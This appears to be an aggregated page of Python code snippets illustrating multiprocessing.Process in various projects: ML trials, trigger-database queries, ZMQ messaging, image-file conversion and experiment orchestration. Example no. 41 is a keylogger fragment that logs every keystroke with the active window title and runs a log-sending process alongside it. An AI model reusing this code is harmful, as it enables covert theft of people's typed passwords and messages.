  for i in range(0,len(this_train_sizes)):
    for j in range(num_trials):
      profile_features,labels = shuffle(profile_features,labels)
      if 1-this_train_sizes[i] > 0:
        cur_X_train, cur_X_test, cur_y_train, cur_y_test = train_test_split(profile_features,labels,test_size=1-this_train_sizes[i],random_state = n)
      else:
        cur_X_train, cur_y_train = profile_features,labels
      reg = RandomForestClassifier().fit(cur_X_train,cur_y_train)
      pred_probs_tmp = reg.predict_proba(profile_features)
      pred_probs = np.zeros((len(pred_probs_tmp),3))
      pred_probs[:pred_probs_tmp.shape[0],:pred_probs_tmp.shape[1]] = pred_probs_tmp
      results[num_trials*len(this_train_sizes)*n  + j*len(this_train_sizes) + i] = log_loss(labels,pred_probs)

procs = []
for n in range(num_trials):
  p = Process(target=run_trial, args=(profile_features,labels,this_train_sizes,results,sub_proc_trials,n))
  p.start()
  procs.append(p)
for n in range(num_trials):
  procs[n].join()

results = np.array(results)
results = results.reshape((num_trials*sub_proc_trials,len(this_train_sizes)))
print(results)
min_results = np.min(results,axis=0)
avg_results = np.mean(results,axis=0)
max_results = np.max(results,axis=0)

json.dump(avg_results.tolist(),open("avg_random_"+str(num_trials*sub_proc_trials)+"sim.json","w"))
json.dump(min_results.tolist(),open("min_random_"+str(num_trials*sub_proc_trials)+"sim.json","w"))
json.dump(max_results.tolist(),open("max_random_"+str(num_trials*sub_proc_trials)+"sim.json","w"))
Example no. 41
        # getting the current active window
        user32 = ctypes.WinDLL('user32', use_last_error=True)
        curr_window = user32.GetForegroundWindow()
        event_window_name = win32gui.GetWindowText(curr_window)
        if window_name != event_window_name:
            window_name = event_window_name
        logging.info(f"{key}    window: {window_name}")  # logging data
    except:
        pass


def start_logging():
    # print('logging started..')
    logging.basicConfig(filename=filename, level=logging.DEBUG, format="%(asctime)s %(message)s")
    with Listener(on_press=on_press) as listener:
        listener.join()


if __name__ == '__main__':
    # to disallow multiple instance of the program
    mutex = win32event.CreateMutex(None, 1, 'mutex_var_qpgy_main')
    if win32api.GetLastError() == winerror.ERROR_ALREADY_EXISTS:
        mutex = None
        print("Multiple instances are not allowed")
        exit(0)
    # starting both functions concurrently
    p1 = Process(target=start_logging)
    p2 = Process(target=send_log)
    p1.start()
    p2.start()
Example no. 42
def rateNameInfo(runLbRanges,mySignal,numProc=1):
	def rateNameWorker(queueIn,queueOut):
		worker = COOLQueryWorker()
		while(1):
			try: run = queueIn.get(False,0.001)
			except Empty:
				sleep(.001)
				continue
			if run is True:
				break
			runLbStart=run<<32
			runLbEnd=runLbStart+1
			nameToChannel={}
			nameToFolder={}
			#L1 Triggers
			folder = worker.getFolder("/TRIGGER/LVL1/Menu")
			folder.setPrefetchAll(False)
			folderIterator = folder.browseObjects(runLbStart,runLbEnd,cool.ChannelSelection())
			while folderIterator.goToNext():
				currentSlice = folderIterator.currentRef()
				nameToChannel[currentSlice.payloadValue('ItemName')] = currentSlice.channelId()
				nameToFolder[currentSlice.payloadValue('ItemName')] = 0
			folderIterator.close()			
			#HLT Triggers
			folder = worker.getFolder("/TRIGGER/HLT/Menu")
			folder.setPrefetchAll(False)
			folderIterator = folder.browseObjects(runLbStart,runLbEnd,cool.ChannelSelection())
			while folderIterator.goToNext():
				currentSlice = folderIterator.currentRef()
				if currentSlice.payloadValue('ChainName').startswith('L2'):
					nameToChannel[currentSlice.payloadValue('ChainName')] = int(currentSlice.payloadValue('ChainCounter'))
					nameToFolder[currentSlice.payloadValue('ChainName')] = 1
				elif currentSlice.payloadValue('ChainName').startswith('EF'):
					nameToChannel[currentSlice.payloadValue('ChainName')] = int(currentSlice.payloadValue('ChainCounter'))
					nameToFolder[currentSlice.payloadValue('ChainName')] = 2
			folderIterator.close()			
			#Totals/Streams
			folder = worker.getFolder("/TRIGGER/HLT/TotalRates")
			folder.setPrefetchAll(False)
			for channel in folder.listChannels():
				nameToChannel[folder.channelName(channel)] = channel
				nameToFolder[folder.channelName(channel)] = 3
			queueOut.put(({run:nameToChannel},{run:nameToFolder}))
		queueOut.put(True)
		return	

	def terminateProcesses(QueryProcesses,troughQueue):
		while 1:
			try:troughQueue.get(False)
			except Empty: break
		logger.critical('Queue is empty')
		for i in range(numProc): troughQueue.put(True)
		time.sleep(1)
		for process in QueryProcesses: 
			process.terminate()
			process.join()
		logger.critical('Processes are joined')
		raise KeyboardInterrupt

	nameToChannel = {}
	nameToFolder = {}

	troughQueue = Queue()
	resultQueue = Queue()

	processes = [Process(target=rateNameWorker,args=(troughQueue,resultQueue,)) for i in range(numProc)]
	for process in processes: process.start()
	
	counter = 0
	target = 0.
	finished = 0
	
	runs = list(set([runLbStart>>32 for runLbStart,runLbEnd in runLbRanges]))

	for run in runs:
		counter+=1
		troughQueue.put(run)
		
	startingQueries = counter

	logger.info('{0} queries distributed over {1} workers'.format(startingQueries,numProc))

	for i in range(numProc): troughQueue.put(True)
	
	try:
		while(1):
			if not mySignal.is_alive():
				raise KeyboardInterrupt
				break
			try: result = resultQueue.get(False,0.001)
			except Empty:
				time.sleep(.001)
				continue
			if result is True:
				finished+=1
				if finished==numProc: break
				continue
			tempNTC,tempNTF = result
			nameToChannel.update(tempNTC)
			nameToFolder.update(tempNTF)
			counter-=1
			percentComplete = min(100,int(round(float(startingQueries-counter)/startingQueries*100+.5)))
			if percentComplete>=target:
				target+=5.
				logger.info('{0}% complete'.format(percentComplete))
	except KeyboardInterrupt:
		logger.critical('Caught signal, terminating processes')
		terminateProcesses(processes,troughQueue)
		
	for process in processes: process.join()

	return nameToChannel,nameToFolder
Example no. 43
  BS, steps = int(os.getenv("BS", "64" if TINY else "16")), int(os.getenv("STEPS", "2048"))
  print("training with batch size %d for %d steps" % (BS, steps))

  if IMAGENET:
    from datasets.imagenet import fetch_batch
    from multiprocessing import Process, Queue
    def loader(q):
      while 1:
        try:
          q.put(fetch_batch(BS))
        except Exception:
          traceback.print_exc()
    q = Queue(16)
    for i in range(2):
      p = Process(target=loader, args=(q,))
      p.daemon = True
      p.start()
  else:
    X_train, Y_train = fetch_cifar()

  Tensor.training = True
  for i in (t := trange(steps)):
    if IMAGENET:
      X, Y = q.get(True)
    else:
      samp = np.random.randint(0, X_train.shape[0], size=(BS))
      X, Y = X_train[samp], Y_train[samp]

    st = time.time()
    out = model.forward(Tensor(X.astype(np.float32), requires_grad=False))
Example no. 44
			if timeTupleStart.tm_mday != timeTupleEnd.tm_mday:
				timeLabel = '{0}-{1} {2}'.format(time.strftime('%b. %e',timeTupleStart),time.strftime('%e',timeTupleEnd),timeTupleEnd.tm_year)	
			else:
				timeLabel = time.strftime('%b. %e %Y',timeTupleStart)					
	return timeLabel

#====================================================================================================================
"""
This marks the beginning of the script
"""
#====================================================================================================================


if __name__=='__main__':
	try:
		mySignal = Process(target = waitForReturn, args=(sys.stdin.fileno(),))
		mySignal.start()
	
		logger = logging.getLogger(__name__)
		if args.VERBOSE: logger.setLevel(logging.INFO)

		if args.RUNNUMBER is not None:
			logger.info('Getting runLb range for run(s) {0}'.format(args.RUNNUMBER))
			runLbRanges = runNumberToRunLbRange(args.RUNNUMBER)
			args.FILLNUMBER = None
			args.TIMERANGE = None
		elif args.FILLNUMBER is not None:
			logger.info('Getting runLb range for fill(s) {0}'.format(args.FILLNUMBER))	
			runLbRanges = fillNumberToRunLbRange(args.FILLNUMBER)
			args.RUNNUMBER = None
			args.TIMERANGE = None
Example no. 45
'''
Created on 2017-02-04

@author: wangyanyan_b
'''
from multiprocessing import Process
import os


# code to be executed by the child process
def run_proc(name):
    print('Run child process %s (%s)...' % (name, os.getpid()))


if __name__ == '__main__':
    print('Parent process %s.' % os.getpid())
    p = Process(
        target=run_proc, args=('test', )
    )  # To create a child process, just pass in a target function and its arguments to build a Process instance, then launch it with start(); this is even simpler than fork().
    print('Child process will start.')
    p.start()
    p.join()  # join() waits for the child process to finish before continuing, and is usually used for synchronization between processes.
    print('Child process end.')
Example no. 46
    print "Connecting a server to queue device"
    context = zmq.Context()
    socket = context.socket(zmq.REP)
    socket.connect("tcp://127.0.0.1:%s" % backend_port)
    server_id = random.randrange(1,10005)
    while True:
        message = socket.recv()
        print "Received request: ", message  
        socket.send("Response from %s" % server_id)

def client(frontend_port, client_id):
    print "Connecting a worker #%s to queue device" % client_id
    context = zmq.Context()
    socket = context.socket(zmq.REQ)
    socket.connect("tcp://127.0.0.1:%s" % frontend_port)
    #  Do 10 requests, waiting each time for a response
    for request in range (1,5):
        print "Sending request #%s" % request
        socket.send("Request from client: %s" % client_id)
        #  Get the reply.
        message = socket.recv()
        print "Received reply ", request, "[", message, "]"

Process(target=server, args=(backend_port,)).start()  

time.sleep(2)
    
for client_id in range(number_of_workers):
    Process(target=client, args=(frontend_port, client_id,)).start()

Example no. 47
def execute(dag,graph_id,publication_rate,execution_interval,\
  processing_interval,remote_log_dir,local_log_dir,inventory_file,zmq,zk_connector=None):

    #get count of physical nodes present in the test-bed
    nodes = []
    with open(inventory_file, 'r') as f:
        for line in f:
            nodes.append(line.split(' ')[0])

    #get all vertices in DAG
    with open(dag, 'r') as f:
        next(f)  #skip header
        vertices = f.readlines()

    #get count of physical nodes that will be used in the experiment
    if len(vertices) > len(nodes):
        experiment_node_count = len(nodes)
    else:
        experiment_node_count = len(vertices)

    sinks = int(vertices[0].strip().split(';')[5])

    if zmq:
        #start coordinator
        print('ZMQ based implementation')
        coord = coordinator.Coordinate(zk_connector=zk_connector,
                                       graph_id=graph_id,
                                       vertex_count=len(vertices),
                                       sink_count=sinks)
        zk_coordinator = Process(target=coord.run)
        zk_coordinator.start()

    #clean-up remote log directory
    subprocess.check_call(['ansible-playbook','playbooks/clean.yml',\
      '--limit','all[0:%d]'%(experiment_node_count-1),\
      '--inventory',inventory_file,\
      '--extra-vars=dir=%s'%(remote_log_dir)])

    #execute each vertex on a separate device
    for idx, vertex_description in enumerate(vertices):
        if idx >= (len(nodes) - 1):
            node_id = len(nodes) - 1
        else:
            node_id = idx
        if idx == (len(vertices) - 1):
            subprocess.check_call(['ansible-playbook','playbooks/vertex.yml',\
              '--limit','all[%d]'%(node_id),\
              '--inventory',inventory_file,\
              "--extra-vars=detachedMode=False \
        graph_id=%s \
        vertex_description='%s' \
        publication_rate=%d \
        execution_interval=%d \
        log_dir=%s \
        processing_interval=%d \
        zmq=%d"                     %(graph_id,\
              re.escape(vertex_description.strip()),\
              publication_rate,\
              execution_interval,\
              '%s/%s'%(remote_log_dir,graph_id),\
              processing_interval,zmq)])
        else:
            subprocess.check_call(['ansible-playbook','playbooks/vertex.yml',\
              '--limit','all[%d]'%(node_id),\
              '--inventory',inventory_file,\
              "--extra-vars=graph_id=%s \
        vertex_description='%s' \
        publication_rate=%d \
        execution_interval=%d \
        log_dir=%s \
        processing_interval=%d \
        zmq=%d"                     %(graph_id,\
              re.escape(vertex_description.strip()),\
              publication_rate,\
              execution_interval,\
              '%s/%s'%(remote_log_dir,graph_id),\
              processing_interval,zmq)])

    #copy log files from remote devices
    while (not verify('%s' % (local_log_dir), sinks, experiment_node_count)):
        #collect all log files
        subprocess.check_call(['ansible-playbook',\
          'playbooks/copy2.yml',\
          '--inventory',inventory_file,\
          '--limit',\
          'all[0:%d]'%(experiment_node_count-1),\
          '--extra-vars=src_dir=%s/%s/dag dest_dir=%s/dag/'%(remote_log_dir,graph_id,local_log_dir)])

    if zmq:
        zk_coordinator.join()
                    stimulus = cv2.imread(
                        os.path.join(
                            STIMULI_FOLDER, dataset, dataset_subfolder, stimulus_filename
                        ), 0
                    )
                    for model_name in MODELS_LIST:
                        lock = Lock()
                        ps = []
                        for simulated_scanpath_ID in range(NUMBER_OF_SIMULATED_SCANPATHS):
                            ps.append(
                                Process(target=utils.scanpath_single_process,
                                    args=(
                                        lock,
                                        simulated_scanpath_ID,
                                        model_name,
                                        stimulus,
                                        SIMULATED_SCANPATHS_FOLDER,
                                        dataset,
                                        dataset_subfolder,
                                        stimulus_filename
                                    )
                                )
                            )
                            ps[-1].start()

                        for simulated_scanpath_ID in range(NUMBER_OF_SIMULATED_SCANPATHS):
                            ps[simulated_scanpath_ID].join()

                        print("-- -- -- Total execution time:", time.time() - start_time, "s")

Example no. 49
        def get_data_for_df_test(
            start_date,
            end_date,
        ):
            """
            """
            #status message-----------------------------------------------------
            Multiprocess.logger.debug(
                "{}[{}function       {}]   {}   {}".format(
                    cs.RES,
                    cs.CYA,
                    cs.RES,
                    "{}[Started        ]".format(cs.WHI),
                    "Multiprocess.test_concat.get_data_for_df_test",
                ))

            #-------------------------------------------------------------------
            test = Multiprocess.test_level
            process_id = 0
            process_instances_ret = []
            queue = JoinableQueue()
            queue_evnt = JoinableQueue()
            date_format = "%m/%d/%Y"

            for date in range(3):
                end_date_o = datetime.strptime(
                    end_date[date],
                    date_format,
                ).date()
                start_date_o = datetime.strptime(
                    start_date[date],
                    date_format,
                ).date()

                process_name = "process_{:03d}".format(process_id)

                process_inst = Velo(
                    process_id=process_id,
                    process_name=process_name,
                    queue=queue,
                    queue_evnt=queue_evnt,
                    date_id=date,
                )

                process = Process(target=process_inst.run)

                process_id += 1
                Multiprocess.process_cnt += 1
                Multiprocess.process_instances.append(process_inst)
                Multiprocess.processes.append(process)

            for i in range(Multiprocess.process_cnt):
                Multiprocess.processes[i].start()

            for i in range(Multiprocess.process_cnt):
                msg_process_id = None
                msg_from_queue = ""
                while True:
                    msg_from_queue = queue.get()
                    msg_stage_id = msg_from_queue[0]
                    msg_process_id = msg_from_queue[1]
                    process_instances_ret.append(msg_from_queue[2])
                    queue.task_done()
                    break

                Multiprocess.processes[msg_process_id].join()

            #status message-----------------------------------------------------
            Multiprocess.logger.debug(
                "{}[{}function       {}]   {}   {}".format(
                    cs.RES,
                    cs.CYA,
                    cs.RES,
                    "{}[Finished       ]".format(cs.WHI),
                    "Multiprocess.test_concat.get_data_for_df_test",
                ))

            return process_instances_ret
"""
multiprocessing.Process example
"""

from multiprocessing import Process

import logger


def say_hello(name):
    logger.info('hello %s', name)


if __name__ == '__main__':
    process1 = Process(target=say_hello, args=('process1', ))
    process2 = Process(target=say_hello, args=('process2', ))
    process1.start()
    process2.start()
    process1.join()
    process2.join()
Example no. 51
def main(argv):          
	"""
	Converts a TDF file (HDF5 Tomo Data Format) into a sequence of TIFF (uncompressed) files.
	    
	Parameters
	----------
	from : scalar, integer
		among all the projections (or sinogram) data, a subset of the volume can 
		be specified, ranging from the parameter "from" to the parameter "to" 
		(see next). In most cases, this parameter is 0.
		
	to : scalar, integer
		among all the projections (or sinogram) data, a subset of the volume can 
		be specified, ranging from the parameter "from" (see previous parameter) to 
		the parameter "to". If the value -1 is specified, all the projection (or sinogram)
		data will be considered.
		
	in_file : string
		path with filename of the TDF to read from (e.g. "Z:\\sample1.tdf").
		
	out_path : string
		path that will contain the sequence of TIFF files (e.g. "Z:\\sample1\\tomo\\"). WARNING: 
		the program does NOT automatically create non-existing folders and subfolders specified 
		in the path. Moreover, if files with the same name already exist they will be automatically 
		overwritten.
		
	file_prefix : string
		string to be assumed as the filename prefix of the TIFF files to create for the projection (or 
		sinogram) data. E.g. "tomo" will create files having name "tomo_0001.tif", "tomo_0002.tif".
		
	flat_prefix : string
		string to be assumed as the filename prefix of the TIFF files to create for the flat (white field)
		data. E.g. "flat" will create files having name "flat_1.tif", "flat_2.tif". If dark or flat data have
		to be skipped the string "-" can be specified.
		
	dark_prefix : string
		string to be assumed as the filename prefix of the TIFF files to create for the dark (dark field)
		data. E.g. "dark" will create files having name "dark_1.tif", "dark_2.tif". If dark or flat data have
		to be skipped the string "-" can be specified.
		
	projection_order : boolean string
		specify the string "True" to create TIFF files for projections (the most common case), "False" 
		for sinograms.		

	TIFF_format : boolean string
		specify the string "True" to create TIFF files, "False" for RAW files.	

	nr_threads : int
		number of parallel threads (actually processes) to use to speed up the whole conversion process.
		
	log_file : string
		path with filename of a log file (e.g. "R:\\log.txt") where info about the conversion is reported.

	Returns
	-------
	no return value
		
	Example
	-------
	Example call to convert all the projections data to a sequence of tomo*.tif files:
	
		python tdf2tiff.py 0 -1 "C:\Temp\wet12T4part2.tdf" "C:\Temp\tomo" tomo flat dark True True 3 "C:\Temp\log.txt"
	
	Requirements
	-------
	- Python 2.7 with the latest NumPy, SciPy, H5Py.
	- TIFFFile from C. Gohlke
	- tdf.py
	
	Tests
	-------
	Tested with WinPython-64bit-2.7.6.3 (Windows) and Anaconda 2.1.0 (Linux 64-bit).		

	"""	

	lock = Lock()

	# To be used without flat fielding (just conversion):
	first_done = False	

	# Get the from and to number of files to process:
	int_from = int(argv[0])
	int_to = int(argv[1]) # -1 means "all files"
	   
	# Get paths:
	infile = argv[2]
	outpath = argv[3]
	
	fileprefix = argv[4]
	flatprefix = argv[5]
	darkprefix = argv[6]
	
	if (flatprefix == "-"):
		skipflat = True
	else:
		skipflat = False

	if (darkprefix == "-"):
		skipdark = True
	else:
		skipdark = False

	if (fileprefix == "-"):
		skiptomo = True
	else:
		skiptomo = False
	
	projorder = argv[7]
	if projorder == "True":
		projorder = True
	else:
		projorder = False	
		
	TIFFFormat = argv[8]
	if TIFFFormat == "True":
		TIFFFormat = True
	else:
		TIFFFormat = False	
		
	nr_threads = int(argv[9])
	logfilename = argv[10]
	
	# Check prefixes and path:
	if not outpath.endswith(os.path.sep): outpath += os.path.sep
	
	# Init variables:
	num_files = 0
	num_flats = 0
	num_darks = 0

	# Get the files in infile:
	log = open(logfilename,"w")
	log.write(os.linesep + "\tInput TDF: %s" % (infile))
	if (TIFFFormat):
		log.write(os.linesep + "\tOutput path where TIFF files will be created: %s" % (outpath))		
	else:
		log.write(os.linesep + "\tOutput path where RAW files will be created: %s" % (outpath))		
	log.write(os.linesep + "\t--------------")			
	log.write(os.linesep + "\tFile output prefix: %s" % (fileprefix))
	log.write(os.linesep + "\tFlat images output prefix: %s" % (flatprefix))
	log.write(os.linesep + "\tDark images output prefix: %s" % (darkprefix))
	log.write(os.linesep + "\t--------------")	
	
	if (not (skiptomo)):
		if (int_to != -1):
			log.write(os.linesep + "\tThe subset [%d,%d] of the data will be considered." % (int_from, int_to))
	
		if (projorder):
			log.write(os.linesep + "\tProjection order assumed.")
		else:
			log.write(os.linesep + "\tSinogram order assumed.")
	
		log.write(os.linesep + "\t--------------")	
	log.close()	

	if not os.path.exists(infile):		
		log = open(logfilename,"a")
		log.write(os.linesep + "\tError: input TDF file not found. Process will end.")				
		log.close()			
		exit()	

	# Open the HDF5 file:
	f = getHDF5(infile, 'r')
	
	oldTDF = False
	
	try:		
		dset = f['tomo']			
		oldTDF = True
		
	except Exception:
		
		pass
		
	if not oldTDF:
		
		try:
			dset = f['exchange/data']

		except Exception:

			log = open(logfilename, "a")
			log.write(os.linesep + "\tError: invalid TDF format. Process will end.")
			log.close()
			exit()
	
	if projorder:
		num_files = tdf.get_nr_projs(dset)	
	else:
		num_files = tdf.get_nr_sinos(dset)			
	f.close()
	


	# Get attributes:
	try:
		f = getHDF5(infile, 'r')
		if ('version' in f.attrs) and (f.attrs['version'] == 'TDF 1.0'):	
			log = open(logfilename,"a")
			log.write(os.linesep + "\tTDF version 1.0 found.")
			log.write(os.linesep + "\t--------------")
			log.close()
		f.close()				
			
	except:		
		log = open(logfilename,"a")
		log.write(os.linesep + "\tWarning: TDF version unknown. Some features will not be available.")				
		log.write(os.linesep + "\t--------------")
		log.close()			

	# Check extrema (int_to == -1 means all files):
	if ((int_to >= num_files) or (int_to == -1)):
		int_to = num_files - 1
		


	# Spawn the process for the conversion of flat images:
	if not skipflat:

		f = getHDF5(infile, 'r')
		if oldTDF:
			dset_str = 'flat'
		else:
			dset_str = 'exchange/data_white'
		num_flats = tdf.get_nr_projs(f[dset_str])
		f.close()	

		if (num_flats > 0):
			Process(target=_process, args=(lock, 0, num_flats - 1, infile, dset_str, TIFFFormat, 
											True, outpath, flatprefix, logfilename)).start()
			#_process(lock, 0, num_flats - 1, infile, dset_str, TIFFFormat, projorder,
			#outpath, flatprefix, logfilename)

	# Spawn the process for the conversion of dark images:
	if not skipdark:

		f = getHDF5(infile, 'r')
		if oldTDF:
			dset_str = 'dark'
		else:
			dset_str = 'exchange/data_dark'
		num_darks = tdf.get_nr_projs(f[dset_str])
		f.close()	

		if (num_darks > 0):
			Process(target=_process, args=(lock, 0, num_darks - 1, infile, dset_str, TIFFFormat, 
											True, outpath, darkprefix, logfilename)).start()
			#_process(lock, 0, num_darks - 1, infile, dset_str, TIFFFormat, projorder,
			#outpath, darkprefix, logfilename)

	# Spawn the processes for the conversion of projection or sinogram images:
	if not skiptomo:

		if oldTDF:
			dset_str = 'tomo'
		else:
			dset_str = 'exchange/data'
		
		# Start the process for the conversion of the projections (or sinograms) in a
		# multi-threaded way:
		for num in range(nr_threads):
			start = ((int_to - int_from + 1) / nr_threads) * num + int_from
			if (num == nr_threads - 1):
				end = int_to
			else:
				end = ((int_to - int_from + 1) / nr_threads) * (num + 1) + int_from - 1

			Process(target=_process, args=(lock, start, end, infile, dset_str, TIFFFormat, 
											projorder, outpath, fileprefix, logfilename)).start()
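

# A minimal standalone sketch (the helper name split_range is illustrative) of the
# range-chunking arithmetic used in the loop above; // is used so the arithmetic
# behaves the same on Python 2 and 3. Each worker gets a contiguous [start, end]
# slice and the last worker absorbs the remainder.
def split_range(int_from, int_to, nr_threads):
	chunks = []
	span = int_to - int_from + 1
	for num in range(nr_threads):
		start = (span // nr_threads) * num + int_from
		if num == nr_threads - 1:
			end = int_to
		else:
			end = (span // nr_threads) * (num + 1) + int_from - 1
		chunks.append((start, end))
	return chunks

# e.g. split_range(0, 10, 3) == [(0, 2), (3, 5), (6, 10)]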
Esempio n. 52
0
    def run_subprocessed():
        """
        This function retrieves required data in a multiprocessed fashion.
        """
        def subprocess_manage(queue):
            """
            This function works as a multiprocess pool supplement.
            """
            #status message-----------------------------------------------------
            Multiprocess.logger.debug(
                "{}[{}function       {}]   {}   {}".format(
                    cs.RES,
                    cs.CYA,
                    cs.RES,
                    "{}[Started        ]".format(cs.WHI),
                    "Multiprocess.run_subprocessed.subprocess_manage",
                ))

            #-------------------------------------------------------------------
            start_allowed = True
            processes_fin = Multiprocess.process_cnt
            stage_id_fin = Multiprocess.stage_fin - 1

            #--Start cpu_cnt/process_cnt subprocesses on first stage------------
            if Multiprocess.cpu_cnt > Multiprocess.process_cnt:
                Multiprocess.cpu_cnt = Multiprocess.process_cnt

            for i in range(Multiprocess.cpu_cnt):
                Multiprocess.processes[i].start()
                Multiprocess.process_last_started += 1

                if not Multiprocess.processes[i].is_alive():
                    Multiprocess.logger.error(
                        "{}[{}process_{:03}/{:03}{}]   {}   Not running".
                        format(cs.RES, cs.PRGnBA, i,
                               Multiprocess.process_cnt - 1, cs.RES,
                               "[stage_id      0]"))

            process_id = Multiprocess.cpu_cnt - 1
            Multiprocess.logger.debug(
                "{}[{}process_{:03}{}-{}{:03}{}]   {}   {} ".format(
                    cs.RES,
                    cs.PRGnBA,
                    0,
                    cs.RES,
                    cs.PRGnBA,
                    Multiprocess.cpu_cnt - 1,
                    cs.RES,
                    "                 ",
                    "{}Started processes on first stage".format(cs.WHI),
                ))

            #--retrieve subprocess results--------------------------------------
            while processes_fin > 0:
                # print some status message-------------------------------------

                Multiprocess.logger.debug(
                    "{}[{}process_xxx/{:03}{}]   {}   {}".format(
                        cs.RES,
                        cs.PRGnBG,
                        Multiprocess.process_cnt - 1,
                        cs.RES,
                        "                 ",
                        "{}retrieving results".format(cs.WHI),
                    ))

                # handle queue data---------------------------------------------
                msg_from_queue = queue.get()
                msg_stage_id = msg_from_queue[0]
                msg_process_id = msg_from_queue[1]
                msg_result = msg_from_queue[2]
                msg_process_id_str = "{}[{}process_{:03}/{:03}{}]   {}".format(
                    cs.RES,
                    cs.PRGnBG,
                    msg_process_id,
                    Multiprocess.process_cnt - 1,
                    cs.RES,
                    "{}[stage_id     {:2}]".format(
                        cs.WHI,
                        msg_stage_id,
                    ),
                )

                Multiprocess.process_result[msg_process_id][
                    msg_stage_id] = msg_result

                Multiprocess.logger.info("{}   {}results retrieved".format(
                    msg_process_id_str,
                    cs.PRGnBG,
                ))
                queue.task_done()

                if msg_stage_id == 0:
                    Multiprocess.queue_evnt[msg_process_id].put([
                        msg_stage_id,
                        msg_process_id,
                    ])

                # mark process as finished if all its stages are finished-------
                elif msg_stage_id == stage_id_fin:
                    Multiprocess.processes[msg_process_id].join()
                    processes_fin -= 1

                    Multiprocess.logger.info("{}   {}terminated/joined".format(
                        msg_process_id_str,
                        cs.PRGnBF,
                    ))

            #status message-----------------------------------------------------
            Multiprocess.logger.debug(
                "{}[{}function       {}]   {}   {}".format(
                    cs.RES,
                    cs.CYA,
                    cs.RES,
                    "{}[Finished       ]".format(cs.WHI),
                    "Multiprocess.run_subprocessed.subprocess_manage",
                ))

            return

        def concatenate(stage_id):
            """
            This function serves as a framework to concatenate results
            from subprocesses in the correct order.
            """
            def ds_cat(
                ds_res,
                ds_nxt_id,
                ds_nxt,
                process_name,
                stage_id,
            ):
                """
                This function concatenates two given data structures.
                """
                if ds_nxt_id != Multiprocess.cat_nxt[stage_id]:
                    Multiprocess.logger.error(
                        "{}[{}{}/{:03}{}]   {}   {}".format(
                            cs.RES,
                            cs.PRGnBE,
                            process_name,
                            Multiprocess.process_cnt - 1,
                            cs.RES,
                            "{}[stage_id     {:2}]".format(
                                cs.WHI,
                                stage_id,
                            ),
                            "ds_nxt_id != Multiprocess.cat_nxt",
                        ))
                    return

                Multiprocess.cat_nxt[stage_id] += 1

                #initial setup
                if ds_nxt_id == 0:
                    Multiprocess.logger.info(
                        "{}[{}{}/{:03}{}]   {}   {}".format(
                            cs.RES,
                            cs.PRGnBH,
                            process_name,
                            Multiprocess.process_cnt - 1,
                            cs.RES,
                            "{}[stage_id     {:2}]".format(
                                cs.WHI,
                                stage_id,
                            ),
                            "{}data appended".format(cs.PRGnBH),
                        ))

                    return ds_nxt

                ds_new = {}

                # the enclosing concatenate(stage_id) helper shadows the
                # module-level numpy concatenate here, so alias it locally
                # (assuming numpy's concatenate is what was intended):
                from numpy import concatenate as np_concatenate

                for i, v in ds_res.items():
                    if type(ds_nxt[i]) == list:
                        ds_new[i] = ds_res[i] + ds_nxt[i]

                    elif type(ds_nxt[i]) == DatetimeIndex:
                        ds_new[i] = ds_res[i].append(ds_nxt[i])

                    else:
                        ds_new[i] = np_concatenate([ds_res[i], ds_nxt[i]])

                Multiprocess.logger.info("{}[{}{}/{:03}{}]   {}   {}".format(
                    cs.RES,
                    cs.PRGnBH,
                    process_name,
                    Multiprocess.process_cnt - 1,
                    cs.RES,
                    "{}[stage_id     {:2}]".format(
                        cs.WHI,
                        stage_id,
                    ),
                    "{}data appended".format(cs.PRGnBH),
                ))

                return ds_new

            #status message-----------------------------------------------------
            Multiprocess.logger.debug(
                "{}[{}function       {}]   {}   {}".format(
                    cs.RES,
                    cs.CYA,
                    cs.RES,
                    "{}[Started        ]".format(cs.WHI),
                    "Multiprocess.run_subprocessed.concatenate",
                ))

            #-------------------------------------------------------------------
            process_result_cat = []
            time_to_wait_if_alive = 0.1
            time_to_wait_if_none = 0.1
            while Multiprocess.cat_nxt[stage_id] < Multiprocess.process_cnt:
                cat_nxt = Multiprocess.cat_nxt[stage_id]
                process_name_nxt = Multiprocess.process_instances[
                    cat_nxt].process_name
                process_name_nxt_str = ("{}[{}{}/{:03}{}]   {}".format(
                    cs.RES,
                    cs.PRGnBE,
                    process_name_nxt,
                    Multiprocess.process_cnt - 1,
                    cs.RES,
                    "{}[stage_id     {:2}]".format(
                        cs.WHI,
                        stage_id,
                    ),
                ))
                #-process that would produce the next results to be concatenated
                #-...was not started yet => continue----------------------------
                if cat_nxt > Multiprocess.process_last_started:
                    continue

                #-...was started and is still running => continue---------------
                if Multiprocess.processes[cat_nxt].is_alive():
                    time_sleep = time_to_wait_if_alive + 2
                    sleep(time_sleep)
                    if time_sleep <= 20:
                        time_to_wait_if_alive *= 2
                    elif time_sleep <= 60:
                        time_to_wait_if_alive += 10

                    if time_to_wait_if_alive > 3.2:
                        Multiprocess.logger.info("{}   {}still running".format(
                            process_name_nxt_str,
                            cs.PRGnBE,
                        ))
                    continue

                #-...finished, but did not produce a result => major error------
                time_to_wait_if_alive = 0.1
                if Multiprocess.process_result[cat_nxt][stage_id] is None:
                    sleep(time_to_wait_if_none)
                    time_to_wait_if_none *= 2

                    if time_to_wait_if_none > 6.4:
                        Multiprocess.logger.error("{}   no results!".format(
                            process_name_nxt_str, ))
                        Multiprocess.processes_kill_all()
                        exit(-1)
                    elif time_to_wait_if_none > 3.2:
                        Multiprocess.logger.warning(
                            "{}   no results yet!".format(
                                process_name_nxt_str, ))

                    continue

                #-...is finished and results are ready for concatenating--------
                time_to_wait_if_none = 0.1
                if Multiprocess.test_level == -1:
                    sleep(0.2)

                process_result_cat = ds_cat(
                    process_result_cat,
                    cat_nxt,
                    Multiprocess.process_result[cat_nxt][stage_id],
                    process_name_nxt,
                    stage_id,
                )

                Multiprocess.process_result[cat_nxt][stage_id] = None

            #--give thread_subprocess_manage time to return---------------------
            sleep(2)

            if thread_subprocess_manage.is_alive():
                Multiprocess.logger.warning("Exiting concat to early!")
                sleep(2)

            # return final results----------------------------------------------
            if stage_id == Multiprocess.stage_fin - 1:
                Multiprocess.process_result_cat_fin = process_result_cat

            #status message-----------------------------------------------------
            Multiprocess.logger.debug(
                "{}[{}function       {}]   {}   {}".format(
                    cs.RES,
                    cs.CYA,
                    cs.RES,
                    "{}[Finished       ]".format(cs.WHI),
                    "Multiprocess.run_subprocessed.concatenate",
                ))

            return

        #status message---------------------------------------------------------
        Multiprocess.logger.debug("{}[{}function       {}]   {}   {}".format(
            cs.RES,
            cs.CYA,
            cs.RES,
            "{}[Started        ]".format(cs.WHI),
            "Multiprocess.run_subprocessed",
        ))

